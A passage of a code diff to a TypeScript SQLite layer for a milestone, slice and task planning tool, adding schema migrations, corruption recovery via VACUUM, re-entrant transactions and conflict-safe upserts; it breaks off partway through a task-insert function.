+      ensureColumn(db, "milestones", "boundary_map_markdown", `ALTER TABLE milestones ADD COLUMN boundary_map_markdown TEXT NOT NULL DEFAULT ''`);
+
+      ensureColumn(db, "slices", "goal", `ALTER TABLE slices ADD COLUMN goal TEXT NOT NULL DEFAULT ''`);
+      ensureColumn(db, "slices", "success_criteria", `ALTER TABLE slices ADD COLUMN success_criteria TEXT NOT NULL DEFAULT ''`);
+      ensureColumn(db, "slices", "proof_level", `ALTER TABLE slices ADD COLUMN proof_level TEXT NOT NULL DEFAULT ''`);
+      ensureColumn(db, "slices", "integration_closure", `ALTER TABLE slices ADD COLUMN integration_closure TEXT NOT NULL DEFAULT ''`);
+      ensureColumn(db, "slices", "observability_impact", `ALTER TABLE slices ADD COLUMN observability_impact TEXT NOT NULL DEFAULT ''`);
+
+      ensureColumn(db, "tasks", "description", `ALTER TABLE tasks ADD COLUMN description TEXT NOT NULL DEFAULT ''`);
+      ensureColumn(db, "tasks", "estimate", `ALTER TABLE tasks ADD COLUMN estimate TEXT NOT NULL DEFAULT ''`);
+      ensureColumn(db, "tasks", "files", `ALTER TABLE tasks ADD COLUMN files TEXT NOT NULL DEFAULT '[]'`);
+      ensureColumn(db, "tasks", "verify", `ALTER TABLE tasks ADD COLUMN verify TEXT NOT NULL DEFAULT ''`);
+      ensureColumn(db, "tasks", "inputs", `ALTER TABLE tasks ADD COLUMN inputs TEXT NOT NULL DEFAULT '[]'`);
+      ensureColumn(db, "tasks", "expected_output", `ALTER TABLE tasks ADD COLUMN expected_output TEXT NOT NULL DEFAULT '[]'`);
+      ensureColumn(db, "tasks", "observability_impact", `ALTER TABLE tasks ADD COLUMN observability_impact TEXT NOT NULL DEFAULT ''`);
+
+      db.exec(`
+        CREATE TABLE IF NOT EXISTS replan_history (
+          id INTEGER PRIMARY KEY AUTOINCREMENT,
+          milestone_id TEXT NOT NULL DEFAULT '',
+          slice_id TEXT DEFAULT NULL,
+          task_id TEXT DEFAULT NULL,
+          summary TEXT NOT NULL DEFAULT '',
+          previous_artifact_path TEXT DEFAULT NULL,
+          replacement_artifact_path TEXT DEFAULT NULL,
+          created_at TEXT NOT NULL DEFAULT '',
+          FOREIGN KEY (milestone_id) REFERENCES milestones(id)
+        )
+      `);
+      db.exec(`
+        CREATE TABLE IF NOT EXISTS assessments (
+          path TEXT PRIMARY KEY,
+          milestone_id TEXT NOT NULL DEFAULT '',
+          slice_id TEXT DEFAULT NULL,
+          task_id TEXT DEFAULT NULL,
+          status TEXT NOT NULL DEFAULT '',
+          scope TEXT NOT NULL DEFAULT '',
+          full_content TEXT NOT NULL DEFAULT '',
+          created_at TEXT NOT NULL DEFAULT '',
+          FOREIGN KEY (milestone_id) REFERENCES milestones(id)
+        )
+      `);
+      db.exec("CREATE INDEX IF NOT EXISTS idx_replan_history_milestone ON replan_history(milestone_id, created_at)");
+
+      db.prepare("INSERT INTO schema_version (version, applied_at) VALUES (:version, :applied_at)").run({
+        ":version": 8,
+        ":applied_at": new Date().toISOString(),
+      });
+    }
+
+    if (currentVersion < 9) {
+      ensureColumn(db, "slices", "sequence", `ALTER TABLE slices ADD COLUMN sequence INTEGER DEFAULT 0`);
+      ensureColumn(db, "tasks", "sequence", `ALTER TABLE tasks ADD COLUMN sequence INTEGER DEFAULT 0`);
+
+      db.prepare("INSERT INTO schema_version (version, applied_at) VALUES (:version, :applied_at)").run({
+        ":version": 9,
+        ":applied_at": new Date().toISOString(),
+      });
+    }
+
+    if (currentVersion < 10) {
+      ensureColumn(db, "slices", "replan_triggered_at", `ALTER TABLE slices ADD COLUMN replan_triggered_at TEXT DEFAULT NULL`);
+
+      db.prepare("INSERT INTO schema_version (version, applied_at) VALUES (:version, :applied_at)").run({
+        ":version": 10,
+        ":applied_at": new Date().toISOString(),
+      });
+    }
+
+    if (currentVersion < 11) {
+      ensureColumn(db, "tasks", "full_plan_md", `ALTER TABLE tasks ADD COLUMN full_plan_md TEXT NOT NULL DEFAULT ''`);
+      // Add unique constraint to replan_history for idempotency:
+      // one replan record per blocker task per slice per milestone.
+      db.exec(`
+        CREATE UNIQUE INDEX IF NOT EXISTS idx_replan_history_unique
+        ON replan_history(milestone_id, slice_id, task_id)
+        WHERE slice_id IS NOT NULL AND task_id IS NOT NULL
+      `);
+
+      db.prepare("INSERT INTO schema_version (version, applied_at) VALUES (:version, :applied_at)").run({
+        ":version": 11,
+        ":applied_at": new Date().toISOString(),
+      });
+    }
+
+    if (currentVersion < 12) {
+      db.exec(`
+        CREATE TABLE IF NOT EXISTS quality_gates (
+          milestone_id TEXT NOT NULL,
+          slice_id TEXT NOT NULL,
+          gate_id TEXT NOT NULL,
+          scope TEXT NOT NULL DEFAULT 'slice',
+          task_id TEXT DEFAULT NULL,
+          status TEXT NOT NULL DEFAULT 'pending',
+          verdict TEXT NOT NULL DEFAULT '',
+          rationale TEXT NOT NULL DEFAULT '',
+          findings TEXT NOT NULL DEFAULT '',
+          evaluated_at TEXT DEFAULT NULL,
+          PRIMARY KEY (milestone_id, slice_id, gate_id, COALESCE(task_id, '')),
+          FOREIGN KEY (milestone_id, slice_id) REFERENCES slices(milestone_id, id)
+        )
+      `);
+      db.prepare("INSERT INTO schema_version (version, applied_at) VALUES (:version, :applied_at)").run({
+        ":version": 12,
+        ":applied_at": new Date().toISOString(),
+      });
+    }
+
+    if (currentVersion < 13) {
+      // Hot-path indexes for auto-loop dispatch queries
+      db.exec("CREATE INDEX IF NOT EXISTS idx_tasks_active ON tasks(milestone_id, slice_id, status)");
+      db.exec("CREATE INDEX IF NOT EXISTS idx_slices_active ON slices(milestone_id, status)");
+      db.exec("CREATE INDEX IF NOT EXISTS idx_milestones_status ON milestones(status)");
+      db.exec("CREATE INDEX IF NOT EXISTS idx_quality_gates_pending ON quality_gates(milestone_id, slice_id, status)");
+      db.exec("CREATE INDEX IF NOT EXISTS idx_verification_evidence_task ON verification_evidence(milestone_id, slice_id, task_id)");
+      db.exec("CREATE UNIQUE INDEX IF NOT EXISTS idx_verification_evidence_dedup ON verification_evidence(task_id, slice_id, milestone_id, command, verdict)");
+      db.prepare("INSERT INTO schema_version (version, applied_at) VALUES (:version, :applied_at)").run({
+        ":version": 13,
+        ":applied_at": new Date().toISOString(),
+      });
+    }
+
+    if (currentVersion < 14) {
+      db.exec(`
+        CREATE TABLE IF NOT EXISTS slice_dependencies (
+          milestone_id TEXT NOT NULL,
+          slice_id TEXT NOT NULL,
+          depends_on_slice_id TEXT NOT NULL,
+          PRIMARY KEY (milestone_id, slice_id, depends_on_slice_id),
+          FOREIGN KEY (milestone_id, slice_id) REFERENCES slices(milestone_id, id),
+          FOREIGN KEY (milestone_id, depends_on_slice_id) REFERENCES slices(milestone_id, id)
+        )
+      `);
+      db.exec("CREATE INDEX IF NOT EXISTS idx_slice_deps_target ON slice_dependencies(milestone_id, depends_on_slice_id)");
+      db.prepare("INSERT INTO schema_version (version, applied_at) VALUES (:version, :applied_at)").run({
+        ":version": 14,
+        ":applied_at": new Date().toISOString(),
+      });
     }
 
     db.exec("COMMIT");
@@ -384,89 +774,104 @@ function migrateSchema(db: DbAdapter): void {
   }
 }
 
-// ─── Module State ──────────────────────────────────────────────────────────
-
 let currentDb: DbAdapter | null = null;
 let currentPath: string | null = null;
-/** PID that opened the current connection — used for diagnostic logging. */
 let currentPid: number = 0;
+let _exitHandlerRegistered = false;
 
-// ─── Public API ────────────────────────────────────────────────────────────
-
-/**
- * Returns which SQLite provider is available, or null if none.
- */
 export function getDbProvider(): ProviderName | null {
   loadProvider();
   return providerName;
 }
 
-/**
- * Returns true if a database is currently open and usable.
- */
 export function isDbAvailable(): boolean {
   return currentDb !== null;
 }
 
-/**
- * Opens (or creates) a SQLite database at the given path.
- * Initializes schema if needed. Sets WAL mode for file-backed DBs.
- * Returns true on success, false if no provider is available.
- */
 export function openDatabase(path: string): boolean {
-  // Close existing if different path
-  if (currentDb && currentPath !== path) {
-    closeDatabase();
-  }
-  if (currentDb && currentPath === path) {
-    return true; // already open
-  }
+  if (currentDb && currentPath !== path) closeDatabase();
+  if (currentDb && currentPath === path) return true;
 
   const rawDb = openRawDb(path);
   if (!rawDb) return false;
 
   const adapter = createAdapter(rawDb);
   const fileBacked = path !== ":memory:";
-
   try {
     initSchema(adapter, fileBacked);
   } catch (err) {
-    try {
-      adapter.close();
-    } catch {
-      /* swallow */
+    // Corrupt freelist: DDL fails with "malformed" but VACUUM can rebuild.
+    // Attempt VACUUM recovery before giving up (see #2519).
+    if (fileBacked && err instanceof Error && err.message?.includes("malformed")) {
+      try {
+        adapter.exec("VACUUM");
+        initSchema(adapter, fileBacked);
+        process.stderr.write("gsd-db: recovered corrupt database via VACUUM\n");
+      } catch (retryErr) {
+        try { adapter.close(); } catch (e) { logWarning("db", `close after VACUUM failed: ${(e as Error).message}`); }
+        throw retryErr;
+      }
+    } else {
+      try { adapter.close(); } catch (e) { logWarning("db", `close after VACUUM failed: ${(e as Error).message}`); }
+      throw err;
     }
-    throw err;
   }
 
   currentDb = adapter;
   currentPath = path;
   currentPid = process.pid;
+
+  if (!_exitHandlerRegistered) {
+    _exitHandlerRegistered = true;
+    process.on("exit", () => { try { closeDatabase(); } catch (e) { logWarning("db", `exit handler close failed: ${(e as Error).message}`); } });
+  }
+
   return true;
 }
 
-/**
- * Closes the current database connection.
- */
 export function closeDatabase(): void {
   if (currentDb) {
+    try {
+      currentDb.exec('PRAGMA wal_checkpoint(TRUNCATE)');
+    } catch (e) { logWarning("db", `WAL checkpoint failed: ${(e as Error).message}`); }
+    try {
+      // Incremental vacuum to reclaim space without blocking
+      currentDb.exec('PRAGMA incremental_vacuum(64)');
+    } catch (e) { logWarning("db", `incremental vacuum failed: ${(e as Error).message}`); }
     try {
       currentDb.close();
-    } catch {
-      // swallow close errors
-    }
+    } catch (e) { logWarning("db", `database close failed: ${(e as Error).message}`); }
     currentDb = null;
     currentPath = null;
     currentPid = 0;
   }
 }
 
-/**
- * Runs a function inside a transaction. Rolls back on error.
- */
+/** Run a full VACUUM — call sparingly (e.g. after milestone completion). */
+export function vacuumDatabase(): void {
+  if (!currentDb) return;
+  try {
+    currentDb.exec('VACUUM');
+  } catch (e) { logWarning("db", `VACUUM failed: ${(e as Error).message}`); }
+}
+
+let _txDepth = 0;
+
 export function transaction<T>(fn: () => T): T {
-  if (!currentDb)
-    throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
+  if (!currentDb) throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
+
+  // Re-entrant: if already inside a transaction, just run fn() without
+  // starting a new one. SQLite does not support nested BEGIN/COMMIT.
+  if (_txDepth > 0) {
+    _txDepth++;
+    try {
+      return fn();
+    } finally {
+      _txDepth--;
+    }
+  }
+
+  _txDepth++;
   currentDb.exec("BEGIN");
   try {
     const result = fn();
@@ -475,38 +880,29 @@ export function transaction<T>(fn: () => T): T {
   } catch (err) {
     currentDb.exec("ROLLBACK");
     throw err;
+  } finally {
+    _txDepth--;
   }
 }
 
-// ─── Decision Wrappers ────────────────────────────────────────────────────
-
-/**
- * Insert a decision. The `seq` field is auto-generated.
- */
 export function insertDecision(d: Omit<Decision, "seq">): void {
-  if (!currentDb)
-    throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
-  currentDb
-    .prepare(
-      `INSERT INTO decisions (id, when_context, scope, decision, choice, rationale, revisable, made_by, superseded_by)
+  if (!currentDb) throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
+  currentDb.prepare(
+    `INSERT INTO decisions (id, when_context, scope, decision, choice, rationale, revisable, made_by, superseded_by)
      VALUES (:id, :when_context, :scope, :decision, :choice, :rationale, :revisable, :made_by, :superseded_by)`,
-    )
-    .run({
-      ":id": d.id,
-      ":when_context": d.when_context,
-      ":scope": d.scope,
-      ":decision": d.decision,
-      ":choice": d.choice,
-      ":rationale": d.rationale,
-      ":revisable": d.revisable,
-      ":made_by": d.made_by ?? "agent",
-      ":superseded_by": d.superseded_by,
-    });
+  ).run({
+    ":id": d.id,
+    ":when_context": d.when_context,
+    ":scope": d.scope,
+    ":decision": d.decision,
+    ":choice": d.choice,
+    ":rationale": d.rationale,
+    ":revisable": d.revisable,
+    ":made_by": d.made_by ?? "agent",
+    ":superseded_by": d.superseded_by,
+  });
 }
 
-/**
- * Get a decision by its ID (e.g. "D001"). Returns null if not found.
- */
 export function getDecisionById(id: string): Decision | null {
   if (!currentDb) return null;
   const row = currentDb.prepare("SELECT * FROM decisions WHERE id = ?").get(id);
@@ -525,9 +921,6 @@ export function getDecisionById(id: string): Decision | null {
   };
 }
 
-/**
- * Get all active (non-superseded) decisions.
- */
 export function getActiveDecisions(): Decision[] {
   if (!currentDb) return [];
   const rows = currentDb.prepare("SELECT * FROM active_decisions").all();
@@ -545,43 +938,30 @@ export function getActiveDecisions(): Decision[] {
   }));
 }
 
-// ─── Requirement Wrappers ─────────────────────────────────────────────────
-
-/**
- * Insert a requirement.
- */
 export function insertRequirement(r: Requirement): void {
-  if (!currentDb)
-    throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
-  currentDb
-    .prepare(
-      `INSERT INTO requirements (id, class, status, description, why, source, primary_owner, supporting_slices, validation, notes, full_content, superseded_by)
+  if (!currentDb) throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
+  currentDb.prepare(
+    `INSERT INTO requirements (id, class, status, description, why, source, primary_owner, supporting_slices, validation, notes, full_content, superseded_by)
      VALUES (:id, :class, :status, :description, :why, :source, :primary_owner, :supporting_slices, :validation, :notes, :full_content, :superseded_by)`,
-    )
-    .run({
-      ":id": r.id,
-      ":class": r.class,
-      ":status": r.status,
-      ":description": r.description,
-      ":why": r.why,
-      ":source": r.source,
-      ":primary_owner": r.primary_owner,
-      ":supporting_slices": r.supporting_slices,
-      ":validation": r.validation,
-      ":notes": r.notes,
-      ":full_content": r.full_content,
-      ":superseded_by": r.superseded_by,
-    });
+  ).run({
+    ":id": r.id,
+    ":class": r.class,
+    ":status": r.status,
+    ":description": r.description,
+    ":why": r.why,
+    ":source": r.source,
+    ":primary_owner": r.primary_owner,
+    ":supporting_slices": r.supporting_slices,
+    ":validation": r.validation,
+    ":notes": r.notes,
+    ":full_content": r.full_content,
+    ":superseded_by": r.superseded_by,
+  });
 }
 
-/**
- * Get a requirement by its ID (e.g. "R001"). Returns null if not found.
- */
 export function getRequirementById(id: string): Requirement | null {
   if (!currentDb) return null;
-  const row = currentDb
-    .prepare("SELECT * FROM requirements WHERE id = ?")
-    .get(id);
+  const row = currentDb.prepare("SELECT * FROM requirements WHERE id = ?").get(id);
   if (!row) return null;
   return {
     id: row["id"] as string,
@@ -599,9 +979,6 @@ export function getRequirementById(id: string): Requirement | null {
   };
 }
 
-/**
- * Get all active (non-superseded) requirements.
- */
 export function getActiveRequirements(): Requirement[] {
   if (!currentDb) return [];
   const rows = currentDb.prepare("SELECT * FROM active_requirements").all();
@@ -621,108 +998,78 @@ export function getActiveRequirements(): Requirement[] {
   }));
 }
 
-/**
- * Returns the PID of the process that opened the current DB connection.
- * Returns 0 if no connection is open.
- */
 export function getDbOwnerPid(): number {
   return currentPid;
 }
 
-/**
- * Returns the path of the currently open database, or null if none.
- */
 export function getDbPath(): string | null {
   return currentPath;
 }
 
-// ─── Internal Access (for testing) ─────────────────────────────────────────
-
-/**
- * Get the raw adapter for direct queries (testing only).
- */
 export function _getAdapter(): DbAdapter | null {
   return currentDb;
 }
 
-/**
- * Reset provider state (testing only — allows re-detection).
- */
 export function _resetProvider(): void {
   loadAttempted = false;
   providerModule = null;
   providerName = null;
 }
 
-// ─── Upsert Wrappers (for idempotent import) ─────────────────────────────
-
-/**
- * Insert or replace a decision. Uses the `id` UNIQUE constraint for idempotency.
- */
 export function upsertDecision(d: Omit<Decision, "seq">): void {
-  if (!currentDb)
-    throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
-  currentDb
-    .prepare(
-      `INSERT OR REPLACE INTO decisions (id, when_context, scope, decision, choice, rationale, revisable, made_by, superseded_by)
-     VALUES (:id, :when_context, :scope, :decision, :choice, :rationale, :revisable, :made_by, :superseded_by)`,
-    )
-    .run({
-      ":id": d.id,
-      ":when_context": d.when_context,
-      ":scope": d.scope,
-      ":decision": d.decision,
-      ":choice": d.choice,
-      ":rationale": d.rationale,
-      ":revisable": d.revisable,
-      ":made_by": d.made_by ?? "agent",
-      ":superseded_by": d.superseded_by ?? null,
-    });
+  if (!currentDb) throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
+  // Use ON CONFLICT DO UPDATE instead of INSERT OR REPLACE to preserve the
+  // seq column. INSERT OR REPLACE deletes then reinserts, resetting seq and
+  // corrupting decision ordering in DECISIONS.md after reconcile replay.
+  currentDb.prepare(
+    `INSERT INTO decisions (id, when_context, scope, decision, choice, rationale, revisable, made_by, superseded_by)
+     VALUES (:id, :when_context, :scope, :decision, :choice, :rationale, :revisable, :made_by, :superseded_by)
+     ON CONFLICT(id) DO UPDATE SET
+       when_context = excluded.when_context,
+       scope = excluded.scope,
+       decision = excluded.decision,
+       choice = excluded.choice,
+       rationale = excluded.rationale,
+       revisable = excluded.revisable,
+       made_by = excluded.made_by,
+       superseded_by = excluded.superseded_by`,
+  ).run({
+    ":id": d.id,
+    ":when_context": d.when_context,
+    ":scope": d.scope,
+    ":decision": d.decision,
+    ":choice": d.choice,
+    ":rationale": d.rationale,
+    ":revisable": d.revisable,
+    ":made_by": d.made_by ?? "agent",
+    ":superseded_by": d.superseded_by ?? null,
+  });
 }
 
-/**
- * Insert or replace a requirement. Uses the `id` PK for idempotency.
- */
 export function upsertRequirement(r: Requirement): void {
-  if (!currentDb)
-    throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
-  currentDb
-    .prepare(
-      `INSERT OR REPLACE INTO requirements (id, class, status, description, why, source, primary_owner, supporting_slices, validation, notes, full_content, superseded_by)
+  if (!currentDb) throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
+  currentDb.prepare(
+    `INSERT OR REPLACE INTO requirements (id, class, status, description, why, source, primary_owner, supporting_slices, validation, notes, full_content, superseded_by)
      VALUES (:id, :class, :status, :description, :why, :source, :primary_owner, :supporting_slices, :validation, :notes, :full_content, :superseded_by)`,
-    )
-    .run({
-      ":id": r.id,
-      ":class": r.class,
-      ":status": r.status,
-      ":description": r.description,
-      ":why": r.why,
-      ":source": r.source,
-      ":primary_owner": r.primary_owner,
-      ":supporting_slices": r.supporting_slices,
-      ":validation": r.validation,
-      ":notes": r.notes,
-      ":full_content": r.full_content,
-      ":superseded_by": r.superseded_by ?? null,
-    });
+  ).run({
+    ":id": r.id,
+    ":class": r.class,
+    ":status": r.status,
+    ":description": r.description,
+    ":why": r.why,
+    ":source": r.source,
+    ":primary_owner": r.primary_owner,
+    ":supporting_slices": r.supporting_slices,
+    ":validation": r.validation,
+    ":notes": r.notes,
+    ":full_content": r.full_content,
+    ":superseded_by": r.superseded_by ?? null,
+  });
 }
 
-/**
- * Insert or replace an artifact. Uses the `path` PK for idempotency.
- */
-/**
- * Delete all rows from the artifacts table.
- * The artifacts table is a read cache — clearing it forces the next
- * deriveState() to fall through to disk reads (native Rust batch parse).
- * Safe to call when no database is open (no-op).
- */
 export function clearArtifacts(): void {
   if (!currentDb) return;
-  try {
-    currentDb.exec("DELETE FROM artifacts");
-  } catch {
-    // Clearing a cache should never be fatal
-  }
+  try { currentDb.exec("DELETE FROM artifacts"); } catch (e) { logWarning("db", `clearArtifacts failed: ${(e as Error).message}`); }
 }
 
 export function insertArtifact(a: {
@@ -733,22 +1080,752 @@ export function insertArtifact(a: {
   task_id: string | null;
   full_content: string;
 }): void {
-  if (!currentDb)
-    throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
-  currentDb
-    .prepare(
-      `INSERT OR REPLACE INTO artifacts (path, artifact_type, milestone_id, slice_id, task_id, full_content, imported_at)
+  if (!currentDb) throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
+  currentDb.prepare(
+    `INSERT OR REPLACE INTO artifacts (path, artifact_type, milestone_id, slice_id, task_id, full_content, imported_at)
      VALUES (:path, :artifact_type, :milestone_id, :slice_id, :task_id, :full_content, :imported_at)`,
+  ).run({
+    ":path": a.path,
+    ":artifact_type": a.artifact_type,
+    ":milestone_id": a.milestone_id,
+    ":slice_id": a.slice_id,
+    ":task_id": a.task_id,
+    ":full_content": a.full_content,
+    ":imported_at": new Date().toISOString(),
+  });
+}
+
+export interface MilestonePlanningRecord {
+  vision: string;
+  successCriteria: string[];
+  keyRisks: Array<{ risk: string; whyItMatters: string }>;
+  proofStrategy: Array<{ riskOrUnknown: string; retireIn: string; whatWillBeProven: string }>;
+  verificationContract: string;
+  verificationIntegration: string;
+  verificationOperational: string;
+  verificationUat: string;
+  definitionOfDone: string[];
+  requirementCoverage: string;
+  boundaryMapMarkdown: string;
+}
+
+export interface SlicePlanningRecord {
+  goal: string;
+  successCriteria: string;
+  proofLevel: string;
+  integrationClosure: string;
+  observabilityImpact: string;
+}
+
+export interface TaskPlanningRecord {
+  title?: string;
+  description: string;
+  estimate: string;
+  files: string[];
+  verify: string;
+  inputs: string[];
+  expectedOutput: string[];
+  observabilityImpact: string;
+  fullPlanMd?: string;
+}
+
+export function insertMilestone(m: {
+  id: string;
+  title?: string;
+  status?: string;
+  depends_on?: string[];
+  planning?: Partial<MilestonePlanningRecord>;
+}): void {
+  if (!currentDb) throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
+  currentDb.prepare(
+    `INSERT OR IGNORE INTO milestones (
+      id, title, status, depends_on, created_at,
+      vision, success_criteria, key_risks, proof_strategy,
+      verification_contract, verification_integration, verification_operational, verification_uat,
+      definition_of_done, requirement_coverage, boundary_map_markdown
+    ) VALUES (
+      :id, :title, :status, :depends_on, :created_at,
+      :vision, :success_criteria, :key_risks, :proof_strategy,
+      :verification_contract, :verification_integration, :verification_operational, :verification_uat,
+      :definition_of_done, :requirement_coverage, :boundary_map_markdown
+    )`,
+  ).run({
+    ":id": m.id,
+    ":title": m.title ?? "",
+    // Default to "queued" — never auto-create milestones as "active" (#3380).
+    // Callers that need "active" must pass it explicitly.
+    ":status": m.status ?? "queued",
+    ":depends_on": JSON.stringify(m.depends_on ?? []),
+    ":created_at": new Date().toISOString(),
+    ":vision": m.planning?.vision ?? "",
+    ":success_criteria": JSON.stringify(m.planning?.successCriteria ?? []),
+    ":key_risks": JSON.stringify(m.planning?.keyRisks ?? []),
+    ":proof_strategy": JSON.stringify(m.planning?.proofStrategy ?? []),
+    ":verification_contract": m.planning?.verificationContract ?? "",
+    ":verification_integration": m.planning?.verificationIntegration ?? "",
+    ":verification_operational": m.planning?.verificationOperational ?? "",
+    ":verification_uat": m.planning?.verificationUat ?? "",
+    ":definition_of_done": JSON.stringify(m.planning?.definitionOfDone ?? []),
+    ":requirement_coverage": m.planning?.requirementCoverage ?? "",
+    ":boundary_map_markdown": m.planning?.boundaryMapMarkdown ?? "",
+  });
+}
+
+export function upsertMilestonePlanning(milestoneId: string, planning: Partial<MilestonePlanningRecord> & { title?: string; status?: string }): void {
+  if (!currentDb) throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
+  currentDb.prepare(
+    `UPDATE milestones SET
+      title = COALESCE(NULLIF(:title, ''), title),
+      status = COALESCE(NULLIF(:status, ''), status),
+      vision = COALESCE(:vision, vision),
+      success_criteria = COALESCE(:success_criteria, success_criteria),
+      key_risks = COALESCE(:key_risks, key_risks),
+      proof_strategy = COALESCE(:proof_strategy, proof_strategy),
+      verification_contract = COALESCE(:verification_contract, verification_contract),
+      verification_integration = COALESCE(:verification_integration, verification_integration),
+      verification_operational = COALESCE(:verification_operational, verification_operational),
+      verification_uat = COALESCE(:verification_uat, verification_uat),
+      definition_of_done = COALESCE(:definition_of_done, definition_of_done),
+      requirement_coverage = COALESCE(:requirement_coverage, requirement_coverage),
+      boundary_map_markdown = COALESCE(:boundary_map_markdown, boundary_map_markdown)
+     WHERE id = :id`,
+  ).run({
+    ":id": milestoneId,
+    ":title": planning.title ?? "",
+    ":status": planning.status ?? "",
+    ":vision": planning.vision ?? null,
+    ":success_criteria": planning.successCriteria ? JSON.stringify(planning.successCriteria) : null,
+    ":key_risks": planning.keyRisks ? JSON.stringify(planning.keyRisks) : null,
+    ":proof_strategy": planning.proofStrategy ? JSON.stringify(planning.proofStrategy) : null,
+    ":verification_contract": planning.verificationContract ?? null,
+    ":verification_integration": planning.verificationIntegration ?? null,
+    ":verification_operational": planning.verificationOperational ?? null,
+    ":verification_uat": planning.verificationUat ?? null,
+    ":definition_of_done": planning.definitionOfDone ? JSON.stringify(planning.definitionOfDone) : null,
+    ":requirement_coverage": planning.requirementCoverage ?? null,
+    ":boundary_map_markdown": planning.boundaryMapMarkdown ?? null,
+  });
+}
+
+export function insertSlice(s: {
+  id: string;
+  milestoneId: string;
+  title?: string;
+  status?: string;
+  risk?: string;
+  depends?: string[];
+  demo?: string;
+  sequence?: number;
+  planning?: Partial<SlicePlanningRecord>;
+}): void {
+  if (!currentDb) throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
+  currentDb.prepare(
+    `INSERT INTO slices (
+      milestone_id, id, title, status, risk, depends, demo, created_at,
+      goal, success_criteria, proof_level, integration_closure, observability_impact, sequence
+    ) VALUES (
+      :milestone_id, :id, :title, :status, :risk, :depends, :demo, :created_at,
+      :goal, :success_criteria, :proof_level, :integration_closure, :observability_impact, :sequence
     )
-    .run({
-      ":path": a.path,
-      ":artifact_type": a.artifact_type,
-      ":milestone_id": a.milestone_id,
-      ":slice_id": a.slice_id,
-      ":task_id": a.task_id,
-      ":full_content": a.full_content,
-      ":imported_at": new Date().toISOString(),
-    });
+    ON CONFLICT (milestone_id, id) DO UPDATE SET
+      title = CASE WHEN :raw_title IS NOT NULL THEN excluded.title ELSE slices.title END,
+      status = CASE WHEN slices.status IN ('complete', 'done') THEN slices.status ELSE excluded.status END,
+      risk = CASE WHEN :raw_risk IS NOT NULL THEN excluded.risk ELSE slices.risk END,
+      depends = excluded.depends,
+      demo = CASE WHEN :raw_demo IS NOT NULL THEN excluded.demo ELSE slices.demo END,
+      goal = CASE WHEN :raw_goal IS NOT NULL THEN excluded.goal ELSE slices.goal END,
+      success_criteria = CASE WHEN :raw_success_criteria IS NOT NULL THEN excluded.success_criteria ELSE slices.success_criteria END,
+      proof_level = CASE WHEN :raw_proof_level IS NOT NULL THEN excluded.proof_level ELSE slices.proof_level END,
+      integration_closure = CASE WHEN :raw_integration_closure IS NOT NULL THEN excluded.integration_closure ELSE slices.integration_closure END,
+      observability_impact = CASE WHEN :raw_observability_impact IS NOT NULL THEN excluded.observability_impact ELSE slices.observability_impact END,
+      sequence = CASE WHEN :raw_sequence IS NOT NULL THEN excluded.sequence ELSE slices.sequence END`,
+  ).run({
+    ":milestone_id": s.milestoneId,
+    ":id": s.id,
+    ":title": s.title ?? "",
+    ":status": s.status ?? "pending",
+    ":risk": s.risk ?? "medium",
+    ":depends": JSON.stringify(s.depends ?? []),
+    ":demo": s.demo ?? "",
+    ":created_at": new Date().toISOString(),
+    ":goal": s.planning?.goal ?? "",
+    ":success_criteria": s.planning?.successCriteria ?? "",
+    ":proof_level": s.planning?.proofLevel ?? "",
+    ":integration_closure": s.planning?.integrationClosure ?? "",
+    ":observability_impact": s.planning?.observabilityImpact ?? "",
+    ":sequence": s.sequence ?? 0,
+    // Raw sentinel params: NULL when caller omitted the field, used in ON CONFLICT guards
+    ":raw_title": s.title ?? null,
+    ":raw_risk": s.risk ?? null,
+    ":raw_demo": s.demo ?? null,
+    ":raw_goal": s.planning?.goal ?? null,
+    ":raw_success_criteria": s.planning?.successCriteria ?? null,
+    ":raw_proof_level": s.planning?.proofLevel ?? null,
+    ":raw_integration_closure": s.planning?.integrationClosure ?? null,
+    ":raw_observability_impact": s.planning?.observabilityImpact ?? null,
+    ":raw_sequence": s.sequence ?? null,
+  });
+}
+
+export function upsertSlicePlanning(milestoneId: string, sliceId: string, planning: Partial<SlicePlanningRecord>): void {
+  if (!currentDb) throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
+  currentDb.prepare(
+    `UPDATE slices SET
+      goal = COALESCE(:goal, goal),
+      success_criteria = COALESCE(:success_criteria, success_criteria),
+      proof_level = COALESCE(:proof_level, proof_level),
+      integration_closure = COALESCE(:integration_closure, integration_closure),
+      observability_impact = COALESCE(:observability_impact, observability_impact)
+     WHERE milestone_id = :milestone_id AND id = :id`,
+  ).run({
+    ":milestone_id": milestoneId,
+    ":id": sliceId,
+    ":goal": planning.goal ?? null,
+    ":success_criteria": planning.successCriteria ?? null,
+    ":proof_level": planning.proofLevel ?? null,
+    ":integration_closure": planning.integrationClosure ?? null,
+    ":observability_impact": planning.observabilityImpact ?? null,
+  });
+}
+
+export function insertTask(t: {
+  id: string;
+  sliceId: string;
+  milestoneId: string;
+  title?: string;
+  status?: string;
+  oneLiner?: string;
+  narrative?: string;
+  verificationResult?: string;
+  duration?: string;
+  blockerDiscovered?: boolean;
+  deviations?: string;
+  knownIssues?: string;
+  keyFiles?: string[];
+  keyDecisions?: string[];
+  fullSummaryMd?: string;
+  sequence?: number;
+  planning?: Partial<TaskPlanningRecord>;
+}): void {
+  if (!currentDb) throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open");
+  currentDb.prepare(
+    `INSERT INTO tasks (
+      milestone_id, slice_id, id, title, status, one_liner, narrative,
+      verification_result, duration, completed_at, blocker_discovered,
+      deviations, known_issues, key_files, key_decisions, full_summary_md,
+      description, estimate, files, verify, inputs, expected_output, observability_impact, sequence
+    ) VALUES (
+      :milestone_id, :slice_id, :id, :title, :status, :one_liner, :narrative,
